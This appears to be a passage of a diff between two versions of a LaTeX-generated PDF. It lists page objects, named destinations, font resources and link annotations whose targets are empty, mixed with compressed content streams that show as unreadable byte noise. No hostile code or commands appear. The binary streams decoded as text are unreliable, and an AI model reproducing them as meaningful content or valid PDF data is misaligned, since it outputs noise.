¬møÌ’Ø3¼$™>Ç‘´#çþ$Š§ñx¡À»teÇDYGRª™x~É…yw“ŸëäJ‚™[õü<˜«í#ð™§IDy£d|ÜIªÄÅ°6Xy{’‡S)ÆÓ4V‡<+ÎæVÜ%P¶éK>;Ñà F[šNáhcuJ[^˜LÅ0Œª U´žÜ¾’@,ìµÊ„°„n8†D/:€^3hU¸-Æà¶)zExQóÀçrÜbž/~¿IY¼ÁhJ,d´„ͽtÌåd´­}ž¤¨É .éÔBŽeK…¿IÒ’E>‘1Á|vNC/AÉBÎè*~ßMòö~ų}JÁbw=Ù¦d-ãï­ç¤u z®Ê:x7ãi™ôz­³Öï}ÙW·ÏÓË î¨$â4,Òæm×ÄÐCýæñYK¥Â³vdÛ¥‚£²€î]Êó4às>l”ƼÂ3(!Â\®2/1ž¸*WA´âmÆ×aöšzÈÃbí[±Ã¿ÕŸ­Ë^ûâ\¼ÖÞ¯#YqÏâbíÒhîI9!;8'{snþ˜Øí6/›Vˆ”†Aü¼æ‹¼~?…Ö›í>vÚ'"˜>~̽Á”ß ,ºõ=Q'¼d£l·½>ÿãÌLà +ê­¼ŽƒEæ]:¬Ÿšå¬ÍóîÏž/UÂGy‰÷7÷ËËõÊ%óíÿ5™y¿ê¿&¸Ê„«û¹vçjõ+ÿŽ·„Ì -endstream -endobj -754 0 obj << -/Type /Page -/Contents 755 0 R -/Resources 753 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 736 0 R ->> endobj -756 0 obj << -/D [754 0 R /XYZ 72 793.935 null] +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [178.567 121.41 258.351 132.201] +/Subtype/Link/A<> >> endobj 753 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> +/D [751 0 R /XYZ 71 806.89 null] +>> endobj +82 0 obj << +/D [751 0 R /XYZ 72 697.078 null] +>> endobj +86 0 obj << +/D [751 0 R /XYZ 72 349.318 null] +>> endobj +90 0 obj << +/D [751 0 R /XYZ 72 289.124 null] +>> endobj +94 0 obj << +/D [751 0 R /XYZ 72 198.52 null] +>> endobj +750 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F26 632 0 R /F24 614 0 R /F22 546 0 R /F14 615 0 R >> /ProcSet [ /PDF /Text ] >> endobj -759 0 obj << -/Length 1360 +756 0 obj << +/Length 1721 /Filter /FlateDecode >> stream -xÚíXmoÛ6þî_!û MŠÔ›±¬MZ·uѸií®Ò`eÆÖb½D’“úßïø"ÇÎÛ1Ú (ö%¤ÈãÝñî¹ãã`cj`ãMë¦E`Ä1<ÛðŒHQÒº¸ÄÆÖß±À7î¤Tb0ׇqn [[§£VçµMŒ®í£+¥ƒ¢€:Æhb\˜j[~ÀÌÏe8åíËÑ»Îkâ¬É3ÇG˜B)ͨiaíèv d]&d-F)"”Š b,PgÆatmñtÒ¶Û1_ž »bÊÌ0ªâ[®–¯âtÊ‹¼ˆÓª«VΖÃï•àoÇjÉAQ_ÍÃZá¯õiÙÂ?ÃÃÈ À bCd¨r#Ê’„§•’ŽÓ¿xTÁ8Kw:  ƒ°ëIíxSñ8LS^(Á<,JP¤ÜÞ©²Y߬JæJ†EV(] /e‚¶ú*”YMw¿@]6$ײ -°#$ÛJø¤l[4Àæ²m{f¶PQ˜Š 1KÎÚÃÌ,oæI˜«Õ»¶í›¡>ÎËL-‡ã9Wk•^ùŠ)«g*½=ãjÀ"–5`Ä–ŒÚËÀìñ"¬dŒÅn¹,+ž¨ùX8¼TóU"ÄA¡½4E®­©5SºJ¡˜ß¶@×|ÁÑêŒ<ÏSgzßÂ$——Q1†*´uæBn]7gqTdev%®ëSS¢@NxqÛ¦¶)÷13&vq·qÄÕ÷¹ƒàÀßk%‹jQj×f«°˜rÀÈzÍ>6>¬eÛlÀ•,ÛE¾ë*…¿h˜/«Y]8å ø)€ò¥Z±j|6«ª¼ÛéÏFà— ±5JIGA§“”0逇’Q>ËŸÇ“còLk×WS[¯\éq\gFÀ×w`|UOLoÌfÝ$ébz©Ž_|9ùºýÁ½"Ñ'&ZÕÙéPU_\ª•4Óýã<+«iÁë¢{PÁÿ°Ø¼‹js¼¬t“pÖ‘!>W=O  ðtíQ–^ÅEòã <-YM²¹–ÊB³eç)–_õNÁòç:Q9/®²"áÚ$¡j¼Yð"æÚj¬q‰5<9dRbM¨]êûâÅï½OÃþ‡Á+xîÝòIw¯ŒX;XwUr€ :ÅëÏÔÂWë§×ž +DúG=äÂó»Q'‹©Víꪒú´Œ»Ž×e~Óõ^fù²ˆ§³êÞn$MI¯IàûÖ½·.÷2+òL4ì Œ¥MÚ‡<åa¡Sڛĕ~“™Y·˜/q:Éît F«ôÞP~ºˆçZ‰M§{5ÙCeÕ`•f¶ -•UÇj£—è„úûâû[Èv"ñŽkyû|õÒÉ-ùÒék½ÓÅ75ý<^ˆÐV‹&oà£ày¬ýìù·ÕÅs!Ìóy…÷Y¨x4K³y6­káüíy¹GJê$£º1Ø°4µâ掱ýªkÉgkUјXëF†ÖÀ@ fÁ. -Cd·ö0]H+Ú  ‚ÃÙᎾ°²Õpõºî| 1 åŠì -¶Ž°ïÆ@×gÍÞjŠÏ~Ô”þ[ìËù™Ù¿ajò%hWY(,óçi˜ðãù^öâ©ìË{Œ}ÑÿÙ×Oƾþ+>¤ûž³A‡Ù¨èa0u¢D"m’°M+Lð!J»Ô;œ9ò¡ø/:kÉב”–ß;H‘­¼N­1"êx;#"{1"âìˈØ6nNÈ÷§Dñ°%µÕ.dßééÏÉð z££µÜ‚¥ûôöûº -]„VG~¢[©Ù› -íñÏ8…b¸ë.&ä4>w½QëoN+_$ +xÚÅXëoÛ6ÿî¿B(LbZ©— Ø€6MÑ¥Ýâ~Jƒ±[‹Ž$'õþúy¤‰ÒtÙ‡}"u<ï~¼å9ÇsN'w +£çP'ò(ñMg•O.¯u’„~è,oP# œåÚ¹t2Å w¿Ôb#§WËów4èñó &š›ÆŠeâÕÉžæg„óÄà6QÊ÷#Œn9¥®XOg,æîûåò³š1·’w{Y7øqS•9Î_=Ƴ1õß•uógZ4d·Ý!‹2pN mÁò!_Aï{l4ñ c‚(De£¾Ô²šý²‘…Ýö›Šç¿Ó,sN<»E)‡¸%]Sƒla c>‰(ï²7Ùâs¥ ôÝ•¬kL§H(7úb€°.«[›?ê}Ö>};^¸irŠX¯§†}>‹$¯È"›³ˆáÌ8HjâBdu‰¢²H¤²ˆJ)ÀyŽÇ;gjÝRÆÓâ/¹jL#zÒê³zž¾]Ž(Jây±åÙ‰Jä„*£aYXW–6@,Ƚ02ù¤B–SÊ0ÃZ¡n CI@©xˆÌCÅ£&q¨¹ïæâVI–f©M¥°TÈMÙ¤B§KX‚ëÚâ 5ŽZŠªMR° ‹MZöT[ ™ qãq´ŸƒŒ¬ÇkM7rÅu†™ËU@V7e•#E<ÖâhnŸ¶úp¯gœÖdÎ*ÙT©¼ŸÚã½ÝÌT–ª´oÀõ<»ÑÞ|€V81à)QOŠ #˜Éo»ªCÅChGb|+dñ Γ®x̹@²€SlÐ+x£|ˆŽ­SÚ…TT˜:Ó£3SÝFó¯ >2oKÑÕ²^$¦m +€˜©*´j¤)D_þø8¬<Æß~ë•Ã+c˜³Ú +h\W)Ò!?Ëвù´M:uÚÈÅbn­ª\¤Y©Þ@%dè *÷\‡*·7òªjw—èj0¨G?áÑ»C³UÀªy i¯&»R UêñM§¾Ux‡Ú¿1[îMmÔSè/·ÛEž/X|…L—gç çÝ'óy“êÀPÓ¶°«å jÿ?¬}t·þ Ö²²:mmm&ïeFy%Ÿò¡¶Ö3ÝS÷¤)×âpÌc6À@GÛØcˆ€˜”´nŠˆý|…¹®@:‹+õ.ú1‹OTb±:!äêÅuzðÜ{¾{ø½âá5¦ú•Í¾¦ÍâÙùÙ¾ñ_Ó¯^Û÷^ö¶p7¶]µaÚÃcèçúÉ›·}©w̧¦3kzûÖ<²>Êýn"­Çlå! “¶ ÃLÔ›w¦º¥§– |Ën:rîqh-uäç%þŠP½?þHnpìú¯¨}ÄDƒ72ìÿ€¨MÔºE¤@ÉslÎà#ƒþ\!ûª“£ªiA¾.\šZáªJ¶ØŠé[h˜Uû¢0¿U˜-G#=wÛ ¢¶ª}”ÕC•6ö’͹½W¿}•­mÿ—ßEÏÜ®ý3Öd½]Nþ1a,Q endstream endobj -758 0 obj << +755 0 obj << /Type /Page -/Contents 759 0 R -/Resources 757 0 R +/Contents 756 0 R +/Resources 754 0 R /MediaBox [0 0 595.276 841.89] -/Parent 761 0 R ->> endobj -760 0 obj << -/D [758 0 R /XYZ 72 793.935 null] +/Parent 735 0 R >> endobj 757 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> +/D [755 0 R /XYZ 71 806.89 null] +>> endobj +98 0 obj << +/D [755 0 R /XYZ 72 760.449 null] +>> endobj +102 0 obj << +/D [755 0 R /XYZ 72 582.583 null] +>> endobj +106 0 obj << +/D [755 0 R /XYZ 72 212.834 null] +>> endobj +754 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F26 632 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +760 0 obj << +/Length 2462 +/Filter /FlateDecode +>> +stream +xڵ˒ã¶ñ>_¡SÌ©ZÂð‘T.N­×qmÙëÙU.ÇIÌR¤–¤f=ùút£|h8ëIªö2š@£ß¯‰6‡M´ysóñFÂo´‘›TmÒ<2Ï7åéæ·ß£Íàßo"¡ólóÉ:mt’Áo½¹»ùéæ›íÍ×ß*¹ÉEž¨d³ÝŽXä±Ùlw›ß#nÃ,×ÁÏ}q°·¿o¿ÿú[ifçµÉD¤¡;-sѬl›Æ–Ãòîpd´CÑDd0ð+]-ˆò…<òX‰Tê‘Y!‘]ßÁo° Ûw€"ÓÁ®ŠÏ0ÏòúÑqüW~KÍÆ©HTêu†Ïà ù\(3‘¦ þ‘ª`g÷Å¥hC¼¦1 +Tn‘Þwôåd +yG'XÈx©¥_–q·o»A¾ÛnùzGšîiWõ+̨\ +0<ÏÍ›×ÛV¤I–ù3¯Ýý…ɼúÚ mÈ6ðµÓ¹®Êj¨™ã5,šƒåïÃÈÇSªÂ8J…É/!²JÞýx·FÒ`å£>îñ|Ó˜àÜ9{{¨vUs@fYÃ7§5µ™¬6½mðê@» +ÓÐ<%X¦FÈ4÷D¼ˆR¯p}eÁÝ…D4‘‡‚6¹£ 4 +VgGl;Í•mM8ú¼ÒõsCPïΨ˜eœfP8áªoy¤Ê³ ?ùêÛÚÖWñ© ­ÀŸÙ4}ãjâsíª™¯úÅØìÈy ° ’]ó#ƒUSçžBßSHÉ9–~@.ͳ±¸Ïdö’Øjä“à‚ˆ0ä8¢v¯‡¢jz&†&Òxr6ÂíÞ“½:‚Ï5˜¨™‚sml½FYŽ£Z>æ‰q1É!o×ÆÀÐL#VµÚ»dɈ´eN n;Ç’ÂrjÔÐãÁ¥)½ñŒƒÂL=ý·,öózŒHCQÕý²_÷¿¯·7ÿ ü>Ú +endstream +endobj +759 0 obj << +/Type /Page +/Contents 760 0 R +/Resources 758 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 762 0 R +>> endobj +761 0 obj << +/D [759 0 R /XYZ 71 806.89 null] +>> endobj +110 0 obj << +/D [759 0 R /XYZ 72 760.449 null] +>> endobj +114 0 obj << +/D [759 0 R /XYZ 72 709.404 null] +>> endobj +118 0 obj << +/D [759 0 R /XYZ 72 605.447 null] +>> endobj +758 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F24 614 0 R /F22 546 0 R /F14 615 0 R >> /ProcSet [ /PDF /Text ] >> endobj 765 0 obj << -/Length 1871 +/Length 2231 /Filter /FlateDecode >> stream -xÚµXmÛ6þî_!D*.)Qo ®ÉÞ6hq¹¦Ý .@d›¶…È’BQÙøßß ‡ÔÚŽÚÚí‡] Éáp8óÌCÒ<Ø6‡ª§ÔªœÕªqvMçé´VkÓ©YoT‹L½=^x²YF"Äœ/¬¼0  ¦¬$,‹”U ñ?8£ËHJðîˆêƒQj÷•Yãðžš‚å¡jæy–†÷耔B€ñÑÀ œCÑ€I ¡iìí+7æ„HhèWžÈFÑh=Ð×øU´ÆÆyÚm©¯rŽSXg¶9U‰LaõJWúH ³¯¬±2Ü*ÜfîE G7•©H¢Ô£t³¯{’ž·­†g®€‘OôÎË//Á;k‚p§Ö£® Z?. ²µ76ÔFÕ?N‚þªÝWÝhúÑ8wjãœî¼óŠ´0˜3Û>m’HZ2*XB°2Mc¬˜žH–&±'²  ànÛe‡ãÑ á6Xõ_–LSs·:c@l&°‹ÞxJW[ >Ñ?jŒƒÚd¡_t³Å˜áº•qz„wœ]YT~ˆTë&b¶V•_ÓAË×Z1Ô= Ù(×í¶Ó»¬L„ÑãÚŒú¼X -ÚPE %Ï5˜ïÈ|U·Ê×-}¯ `a “¬ÖiÜZ‡³9´(ñ ½zl§á†r‡Ênˆhf åËyðIçIJbgbÊ1°6dPô‚Ε¯&ö'›Íkg<>QLrˆVî¶h5c šç¥WéôŒ ò˜‹ÉJ´ú-¿¢ ²ƒ|. -0êøüU7`ª3aéÎO—è8tq¥[ê8A _!ö=’á@û -G)od¾¢íØ®maØ`å -O9’I‘ ªuמ/òi 'M¥kGÿÐó°¯çΔµV€P¬¦èw£ymH„¢í´;ÆŽÇ b÷å±Ï×jŸr4lº¶àFÔÆqø¼:(’8/¡;(SÃÙMj:sP<ólr¢ë©Ð¡ˆ- Ÿ,ûû¤±(Kˆ…ÒŠDÊd‰¥®~|oOÏrâåúdûº±5 -[âR8·$‡Óü¾ð '‚¹Òt$Kc¥›QÓI*Bk,s”šµqN þ…Þq›Ûè›a¬{°ŸRÅË]Xbqh‚²†Sp¦L8ÖIâëÄÝÆ~å)‡?1S.)gI{ý‰Í¦¥‰'/ñ gøœq$pƒ.¼áï¾óÙ»oÎx6¹@a%8+dz^Æ·Ÿ«Cß8Ï:ÇsÕ ¡È2ó&_‰ ‹¨³,Ÿq"O™(¦¦Ò;e®ÏNáßú^ÞÎ…e³”.–9Ùû›»˜ÍÞßH¦½›°þH=ÑHßoöÆô×WW"™ÈX ö@zE—™«Ã„+pð¿p-fý¾ÿG½ù»øÆY¡Kž?]\ÔÑ£"?}0À¥(¼ ŸQ`">®Æ֌ٳÿ÷¦üSòï@Ê;­¦Ü,aé̺ð“òiRË$ù+SÓïž>5¯Oâ„s(NV$ d‘Eý:jêvüíÚñ[¤;ÔZ¹Ý¼¼¹!a·^G¬iU5sï3ä7¤º1îBL„°¬ò8ö'aÓÎáSæ“ÿ“®ÖvÀåí-}g1Ãgæ rr–'òI#+ÒÜ!G< tìËx‚Ng÷6‰÷¦ßN6 -ÔÿçtècKp÷ëÀíçOõÞnj3½ÝQrúrŠ1ãÉôs€î6p5þ«Éâô=]ø‹- -ø‚±wehÇœs”ìKbëÎ\h[ºsþ ]>ãs yI’ø)ð§°}ØÒWñòüücx9 †j.3SüQÍuí×#œá2q‚” Bâ(%u µüÐå~ÿy[dþ‚b ²<_õù¸s¦3ÿXó‹p~æײ8óWÒÌ›®?êz·7ë®=k°Ë¢ˆ½½ØÜM§ûï}vÎDãÎÀ•©Ò›/ -H†>Åÿ©ÛM÷àJìß÷ôM}%¡?`üÅX7ÎH,Êôzö·7úáM†r -U4+—¸/0z{¿øâvTÜ +xÚµYK“Û6¾Ï¯ÐQª²0 ¾æ¶®8k§ïf¬œl0$qM‘2yfþýv£>$Ê™8•ƒM°Õh4úñu7‡Ïv3>û÷Í×›ž|Í21Ë +΢¢˜­7?óÙè¿Ì8“E>{t\‡™LsxV³7¿ß¼^ÝÜþ,¢YÁŠT¤³Õ–dĬˆ“Ùj3û8OØb™rþ‡Q;½ø¼úåöç(ðË$g\‚@Ç-8²Üp¯Ú™ì¥g^ʘIY„b/–Q$‹ù[xÎW ø÷_:Jˆ¡jKdŽúÃèvù¯®qõìÃÓ’”EQàÞkµÑí„þËHd,M²ÙR$LðœØ?<–v½9ì3wªHÉÒ z¹<¡*j¬Êè4e<-ÂUo&DF‹Ó¬Ú[sX*” ¢í¤î1gÉUUË÷৬iíH‚ñ qššbcÔ¡ñ©ø¡9 ³H禴Úг“a(ÊóèÖ‡ÒÒ”¿Ñ×÷øB¤¦¦'i §öÆ‚e©|)&q~€ 0uèuuæ„ÅV•ÕH$˜H­6\j’.ÏYÌÅØáåøyä,¶åT•’jðKï"Š.0ìPvÝXZôI©7¯”CD˜Nî²ðJ{E¿W?yï­­ÞÉð”Fžý¡R䯪4ßRžG×}tè¼ÀßÜ>uÖÊ„è÷ðBéQùÄ3{_|ÜÛ3Ûœ|’ÑãYã +‚£Ö×róCu¶+ƒ}•ý¸ßßw‚¦*ûñÍ=ðþ?÷þÝ­[ÐkKëS[Ñâ¸M½A÷!…J®Tí™ë/uóè^r ÙXe±(ázÝlô+Lûì ¸éꉀ9öÙ@Å)7;ˆx÷Rt¨›œ7Gr%RÝ¡ßÓ´Ä5(/WÚ»©¾â}cÑm)DÒ^YZ©Ê4æ¼FQ”2)^š¿…¼Ä"íÂÓ>¯P…*kãõùðû¯ž³þä(…5¾n{-§Ú€¦dP}+ýMWS#g"# 5ÚŸn›‰a †z »<ž +íwÞ![ÓRrKèQ¢¨g·z Pí»Ÿ©÷®MÀÛ»‡®ÅÆÄÊBFv%o£-à·a +CXBáHEÒOIò¦¤{½Õm|F€¥/˜¢ˆÚ47çóÑÔt§LH9h£†JŒ¥{ÖQ½~‡½”/× CÂœ7ÈXìúÉ5È™kCÂÊë¥8’)DAÂ/‘¿ !ñøE4M¤«ø%XÒOõ×LfŹP2ÁåÑ ×z!ƒC/¤ÐËmÜö:N]Ž^cÍ‚6½ð”iôÔæñ÷Ð+gixÓúk=¸6ÉAO*‚5¨(I–Ž]}¯ ¶â[Õ°‹ð˜%ÿ"f%³Þ<Ù{¼kïóØ»ÅL\‡ÿ¸¹.ö:ÜøÀùåtÑuÑð¨õcUÖÚÓjψ}´õKCÏî=­ñü=Q´¢¦Ø]—EÎæø 6w¿»y .†;ÐÏ4⺠{úº©±_ßÚÐÁñÝûw´pS)žƒE;†NIù:îÊHw#Ž%ÛÂOµœ Ó}3êp¬¦¼™@í|é¿+†Û©Ï0ˆÜu8=÷3²ô“;n* ]Á†¼HÅt¢}p &cƒå*"©\¬^Ć˜ƒ€ ùòô%ŸMñ¥}>ê?3ÅË>˜:qëVo¦¿òJ–c/=Ìü¨‰Nrß²cˆ&ÌWpášÖ!5´òZ9ƒÁÓ…m˜FËí3mzÜ—ÝG¬$À®¼©á'25¼©©S +t“gâ+"òѧĬûH‘Q²À{‰ÑpðbŒLV»±ý˜OC%X.Ì¡PýÌÙŒ*½ÐÇ>ìj}›¸üåðM¥ÿ¦_í#ÂÖN«0ºÝ8‰“1&{‰U·ißꇧcï’¦%È}T:÷Ôû ìŒïÆdr£ªK>Ž«öì+4„š5™07ÉñÐö‰GÙùFÄhö(Ò®¼¿V¢ç;',‰})"òNø©ÜþÑ#Þ¯~ýmò›ÕÍÿþ"Áõ endstream endobj 764 0 obj << @@ -3254,244 +2793,323 @@ endobj /Contents 765 0 R /Resources 763 0 R /MediaBox [0 0 595.276 841.89] -/Parent 761 0 R -/Annots [ 762 0 R ] ->> endobj -762 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [316.596 656.71 412.656 667.501] -/Subtype/Link/A<> +/Parent 762 0 R >> endobj 766 0 obj << -/D [764 0 R /XYZ 72 793.935 null] +/D [764 0 R /XYZ 71 806.89 null] >> endobj -218 0 obj << -/D [764 0 R /XYZ 72 632.53 null] +122 0 obj << +/D [764 0 R /XYZ 72 760.449 null] >> endobj -222 0 obj << -/D [764 0 R /XYZ 72 557.224 null] +126 0 obj << +/D [764 0 R /XYZ 72 463.83 null] +>> endobj +130 0 obj << +/D [764 0 R /XYZ 72 341.186 null] +>> endobj +134 0 obj << +/D [764 0 R /XYZ 72 235.105 null] >> endobj 763 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F24 512 0 R /F22 421 0 R >> +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F26 632 0 R /F14 615 0 R >> /ProcSet [ /PDF /Text ] >> endobj -769 0 obj << -/Length 1451 -/Filter /FlateDecode ->> -stream -xÚÝW[oÛ6~÷¯Š‘Ä¢®Š®Iœ.EnMt@²ÄØB­K$:™ÿý/’,G]—!ÛÃl^t.ÏwHbca`ãÓèqD Å1|ÛðCŒHq6º½ÃFóŸ Œœ00ž¥Tf8^íʸ}ÌFûÇ61Bz¶gÌ” ŠBê³Ä¸5]4¶‚Ð1oêhÁÆw³ÏûÇÄÝ’wÜa JiÇ"#¬¡–þl99N¨„¦DY¹bc‹Rj¹j#e»‡Å¥ÐklŸ¥qUÔÅ…€š×_Nu‡UOcj›¬RccWôñeĻ4fj|)Ä¢XüW²x`E6ñ¥vã–GÕ‚ñIo]?j¿g`És„%ËvÂ’,ÛCv`+ƒ¿Œ-×vÍr×bñ¢_ÌÇU•¨Ü¨k­ÚwKÎËÉþ>ñm¸lBao¿–òûí¾æŠêòCeìýjÍ—¬z§­ˆå«.Ö3s±kÙ-ð¤y”笚4Ÿˆ q§ê“eYCÓ[›!ÌÊÍpmò'±bRm„Â!›aÈN† aOM~Ã.>É9[©áï3Dú¤>ò izŽ/bí’8}/Ž‰ñ„Ò õ‡ðå¦JKÞ9¥©I °:¸;‹;,ª²¨"ž€;ïYwtFþª¬Òš)i’6ÒrÜìó×4OŠçZ Îgªu‘­PPët•¨y -\žèðBTe‹Áe×°ÛHYC¡Ò[·C*¹ñØmÀE¾@Aˆ‚³ºN%-2k‘š°¡/i"R cMê‹VœO´C{KP@³ý†N–¯«Šår‚€ùAÛ–Ö±H€|_c<Ä÷3­U[Ž-;0 ;—Ŧx!Z׬¯R&“ßöÍæãRw’ˆGó¨Ö£,Ê¡²e,ƒ5®ôëMÍY¶§I²÷¼Lc!¶Tb ö SÊbž>‰lµÙȪ‡¢ÊÒ|±ƒâqͪM›LÖ«#ÙTD% DD*‚Õð¦3o:µèh±‡ªÈv4Ÿ%ž¹8fT–«4ní¤Ð)rÔ"ØŠô?-Л¶&»#ÏØYßE$ðÞ¢¶ˆ™ï»ýÚÚ+ªª¢Â2ÿFQ%”@IYYU³ (ËÚšæ•ËòCš¼'MQU,ØÍ-•rº-´Vç¼’:@l NhîqVs1ñ몈£Õ²¨ùÞkHK5i¥q²qEÜ6Éÿ%æ&óWñH²Ú]ÞŠ„-TŠ*Þ*í’ #-¤UÅU±@Ó×7µ§-úîh¶mnІaüÿêFƒÿÏ7Â’Š|õ_‘DÛ<„|%õt.ˆ3M0`lîedKõ*Ö9šuGªüBEe±æ]ú öAåtêî8¥ÍQè D–Èf+IÁH”di“à¢7¼ˆZS\Ž>6gÿ[‘;­!žÑ«Hmcµ hwI S’ÔÐ&LGGˆ?èoK-¤v§á®î£‡3Ì)vë~\èàn¡ÁµÉŽMÜ<Õ!}ËóO’ -ø¢b-•D‘;Tx¦9ÎÛœƒ6\«©û¶ŒYÒ1²\üŒ‘:yzl´{lÔ•ò!t7tAŸÃ­Öb¹¾ûœ]OÔ%÷²‹è»o—ËI–MœðN)Þžœžã =§«¼z‰H>ÑnU„ær'?×ïC_x:š‚§ƒ›Oz,ïsÍ}}z:=œuOÃ×SåîëoÓón^ü¶eL½.YõžWk¦Ž¯.Îôf.î;°`çj:Dä;ððæêjz>»¿¹0¯”ÖÅññõtÖ{žžœèùœèE³*ѯšSµŠVwz~Ô¾@~­þ¾èƒž%“ÆÃÀ«JÛpñ"^ª«5Ó9Ch·)«Õ"Ò¼‡¸fp 'õâW4m ËŠöʉÝ!æÞ _§³ÑŸ õtÌ -endstream -endobj -768 0 obj << -/Type /Page -/Contents 769 0 R -/Resources 767 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 761 0 R ->> endobj -770 0 obj << -/D [768 0 R /XYZ 72 793.935 null] ->> endobj -226 0 obj << -/D [768 0 R /XYZ 72 610.549 null] ->> endobj -230 0 obj << -/D [768 0 R /XYZ 72 450.405 null] ->> endobj -234 0 obj << -/D [768 0 R /XYZ 72 303.889 null] ->> endobj -767 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -773 0 obj << -/Length 1411 -/Filter /FlateDecode ->> -stream -xÚµWÛnÛ8}÷WÅ• ˆ&)J¤  Ë–ÓiÒÚÎîi(6 ,G’“5Ðß¡HùÒh“¶plŠÔpx83çÂÖ­…­£Ö}‹@‹-bqjñ#Ö4m]\bkãï-ŒX ¬ÇÊ*µ˜/ ½³Æ­O­pÒê )±øÔ·&7Ú‡‹׳&3ëÂöP۳ϋøV¶/'ï;CâíØ3O ÌÀaeÍ|eÒšå˜×sc6ŠþÓål;®ëÚÙB·ñB;ß㻵ï³<žV³„kÿé–`Dì¸XÀw7ÀÊ8¿•ewÝÿµÂ·8ò™räFð¸åPŽ|ÀS9ü£íxÔ³—ër®¶ ž‹6±ïïÒx‰–k=â¬tûj^–Ën§C8EÄG”¸™Ø.éÕ„NVí­¯’E‰–óåŸÉì-y¥¦3Ûq’™]ÇÆéƒn©Ú v(Cð5¬ „Ðeý‚PH¼Á{O¿:r1Ósá‡qW;7amò5ŸwÓ´ëñK=éâøt¨ÏL·”E™,nu'¹Ñít•çrQj׫BææuQ¯ÛÛÇöWõJƒ(„•ÎLÿ~%óuW?£“¨?ÑÏ_°‡û½q¤—ûû]tºW¿]Û£Qït ®Fg'Æ~8:û°U_}ÿ5Öcàm5ER;ŠÞŽ?ÑÉÙÑñéÕ9`G#=¯w:xºàÛþ»‘ä ø'ß¾õa†ñ͈ézª«~O¦4ÚƒŸí”&´“MPˆn¢“1LŠt›±ÓA5¿êì„å¼wÒäóIºö #—ežÈ9ëÖ ÿˆïR¾”ùM–§Ò,q·•ÈB'0Yìí¢Ól1+šVÛ)KoS–l·,+%Û¯'ùJ× rT±ƒ¸qÂjäÈk;„°À>‡¶’™ ’¤øå!Šž-Ë$[tÍBtÇС¡¼Ö.ÇQˆ›:ÆÐ!qnh{\jEU›Sív&ì¬(’ëZtËLµÌ–‹6¼Z¥2ËúÕÜ<Ü%…q”ÝhëY\Æ×qaÞ§ñN„T»0–ź(eª­+Ìh“Œ€Íúß$ÿph~†m—Â6ÊÛ\Ž?hýÈ…à7ˆ?yÌ?ˆøSuy‡°%[ñ_ÞÂC³öƒ°5ùßS¼§Ø\ãÚfH™TRŘnJ¿NPMãô½ì6’ôMÍF÷âY#u TÜú#ú3üò›øÀìe\Uaä0<Óƒó¸˜Ëç(v X41Ž|Ïó· ¬ÖÉò™ðÔ³‘Ø\6b8fŸº$r««—vyÞÄgB âPyš/ü „Ö¡¢Ü®¶¡FLœªg[ý ã©2šëÞÏsþ”ÿ°Þ0݃kžÏbÆ=DÄa¨Ìäü·R=]¿DõºÐž¥»ÿ©fò:‰¤B¹Hã¤æû1ĆdÊö9¹­ieªŠÁ\ ß„á O逆$"¢/|*4 TøJB—öH¨.°"ЗP§Éý]že5&Dì%D‚ ½ˆêz óž¬ç÷¬Ç]2ŒÂaè÷†p¬ª{ ÑF©*ç¿$Œ#Êx8ð†¬î÷"LrYÄý`-£ -Rþ¨_D€ -4qÍàs*=[izLãš'wEf(œgŠ›Él‡Ü JCr±÷¬ÔTµÔ&Y¥„»ZÄÖ:#§ÉÍzOJꋽzœëµ’ ÙªïªD©„Ó˜þŠH!“Uo,ØaÄ%™æY‘Ý”Z`6J3–ùƒ:Qª-BŸbŒõ¹o ŸÉTê~u#¹„ÿ¯Ú7Dš‚¸.=„BQØOÉïüM‹ŸT¨/ÄeUrÄÝ'TžÆ³÷éÊŒš9fÆ 7uñ³KÓúÐãhÒú‘õQ -endstream -endobj -772 0 obj << -/Type /Page -/Contents 773 0 R -/Resources 771 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 761 0 R ->> endobj -774 0 obj << -/D [772 0 R /XYZ 72 793.935 null] ->> endobj -238 0 obj << -/D [772 0 R /XYZ 72 571.521 null] ->> endobj -242 0 obj << -/D [772 0 R /XYZ 72 385.231 null] ->> endobj 771 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -777 0 obj << -/Length 1523 +/Length 2331 /Filter /FlateDecode >> stream -xÚÅWÛnÛF}×WAHE¹ÚoŠÂ9p`KŽ%# \àȕDT¤’²ã¿ïì…´¤Ð¶šè‹—»ž=3;{Î[ [:ß:FlË£–`D‚ÀŠÒÎí¶bXÿhaÄßzTV©Å]Æ•5é|êO;ý3J¬.u­é\û`(`Ž5­Û®ƒz¶ðîM.Dïnú±Fœ-{îøsp¨¬¹'M:Ø@߮僭˥­ÍC„1ù8ôžÛ_ïz¶Cnêñ–ÜõHw =YÄG>å–M(ÄÀô†<,ËÇukëeX.ò“wñwL0Æ!qcóyH:ó"æÇ$¡ ¾ç¸"ðÁ7ñèœÏ'˜Ç~$è“ Ø 3Ï<¹:ßn0 ƒ€á™K…pb»ã(cæ!¢Ú±]Š0Å@cÕ•-Þ5+ÃUUümfiò]ÄQX -c«c„ˆ~ s'F!X›»Mž‹bËθÛKEp´ð^)Ø.EŽãZ6…’7.8*{6 h÷©Gýîz£'Q˜éRˆßz6øû¸Ycé5–Àdra“Š"¬„^U Ê*+² -„9jm]&Q±.×óJO'Ÿ.̇(äfQßVi˜›ï|•ûj)ž}”›RÌ7«&• ¹ÔTq2 Æ 